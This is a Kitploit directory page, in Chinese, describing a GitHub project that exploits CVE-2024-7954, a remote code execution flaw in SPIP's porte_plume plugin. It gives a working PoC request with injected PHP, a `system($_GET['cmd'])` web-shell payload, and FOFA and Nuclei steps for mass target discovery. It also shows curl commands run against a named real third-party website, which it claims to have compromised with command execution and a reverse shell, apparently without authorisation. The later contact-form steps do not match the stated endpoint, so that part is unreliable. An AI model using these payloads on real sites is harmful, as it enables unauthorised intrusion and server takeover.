Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — 远程代码执行漏洞的利用- (CVE-2024-7954) | Kitploit
工具/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
侦察Web漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
实验室与实践
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

远程代码执行漏洞的利用- (CVE-2024-7954)

查看仓库
1159个月前尚未审核

Exploitation of Remote Code Execution Vulnerability (CVE-2024-7954)

软件漏洞测试项目 提交者: Shivansh Kuntal


概述

本项目演示了利用 CVE-2024-7954(一个影响 SPIP CMS 及其 porte_plume 插件的严重远程代码执行(RCE)漏洞)的完整流程。 该漏洞允许未认证攻击者通过精心构造的 HTTP POST 请求在目标服务器上执行任意 PHP 代码。

测试在受控的本地环境中进行,随后扩展至使用 FOFA 和 Nuclei 的现实世界侦察。


1. 环境搭建

在本地 Apache 服务器上部署了受 CVE-2024-7954 影响、已确认存在漏洞的 SPIP CMS 版本,使用一个托管已知易受攻击版本的 GitHub 仓库进行部署。

使用的工具

  • Burp Suite(用于拦截和修改 HTTP 请求)
  • Apache Web 服务器
  • FOFA 搜索引擎
  • Nuclei 漏洞扫描器
  • curl(命令行利用工具)

运行在 localhost 上的 SPIP 首页验证了安装成功,并作为利用目标。


2. 漏洞描述

porte_plume 插件(4.30-alpha2、4.2.13、4.1.16 之前的版本)由于对用户提供的输入清理不足而存在漏洞。 攻击者可以向特定表单字段注入 PHP 代码,这些代码随后会被服务器渲染并执行。

影响: 未认证远程代码执行 严重程度: 严重 攻击向量: 网络 / HTTP POST


3. 概念验证(PoC)

恶意 POST 请求

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

备注

  • PHP 代码被注入到 Markdown 格式化引擎内部。
  • 以服务器上的 SPIP 用户身份执行。
  • 该攻击无需认证。

4. FOFA 侦察

使用 FOFA 查询来枚举公开的 SPIP 安装:

app="SPIP"

FOFA 返回了多个元数据点:

  • HTTP 标头
  • 标题
  • IP 地址和地理位置
  • 服务器技术栈

侦察价值

  1. 目标枚举: 识别可访问的 SPIP CMS 服务器。
  2. 版本指纹识别: 确定是否存在易受攻击的插件版本。
  3. 优先级排序: 选择可能可利用的系统。
  4. 漏洞利用验证: 使用受控载荷验证端点。
  5. 自动化: 将 FOFA 结果导出到 targets.txt 以进行批量扫描。

确定了一个合适的现实世界主机:

http://www.comite-tricolore.org/

5. 使用 Nuclei 进行自动化扫描

目的

由于手动利用速度较慢,使用 Nuclei 在大量目标上自动检测 CVE-2024-7954。

命令(自定义模板)

nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt 加载 FOFA 结果
  • -t 加载自定义 PoC 模板

注意: 初始模板返回无匹配项。

广泛 CVE 扫描

nuclei -l targets.txt -t cves/

此扫描识别出一个响应的目标:

http://www.comite-tricolore.org/

6. 手动验证与利用

步骤 1 — 检查易受攻击的端点

访问:

http://www.comite-tricolore.org/spip.php?page=contact

已确认:

  • 用于姓名、电子邮件、消息的输入字段
  • 适合载荷注入的 POST 请求处理程序

步骤 2 — 注入 PHP 载荷

使用 Burp Suite 或 curl,修改 message 参数:

载荷

<?php system($_GET['cmd']); ?>

步骤 3 — 触发命令执行

访问:

http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

或使用 curl:

curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

输出确认了远程命令执行。

步骤 4 — 反弹 Shell(最终访问)

精心构造的载荷可实现反弹 Shell 回调,从而允许:

  • whoami
  • ls
  • 完全交互式 Shell 访问

7. 关键观察

  • 未认证利用大幅增加了严重程度。
  • 插件的输入清理失败是核心问题。
  • 一旦 PHP 被注入并渲染,就可能实现服务器全面沦陷。
  • 反弹 Shell → 潜在权限提升 → 服务器接管。
  • 使用 curl、Python 脚本或 Nuclei 自动化此攻击非常简单。

8. 结论

本项目演示了 CVE-2024-7954 从侦察到获得交互式 Shell 的完整利用链。

利用路径

  1. 侦察(FOFA)
  2. 自动化扫描(Nuclei)
  3. 手动载荷注入
  4. 验证代码执行
  5. 反弹 Shell 访问

安全教训

  • 对所有用户控制的数据必须进行严格的输入验证。
  • 插件必须遵循安全的编码实践。
  • 组织必须及时应用安全补丁。
  • 定期进行漏洞评估对于防止 RCE 攻击至关重要。

该漏洞凸显了一个看似无害的文本格式化插件在安全配置不当的情况下如何导致系统完全沦陷。

下载工具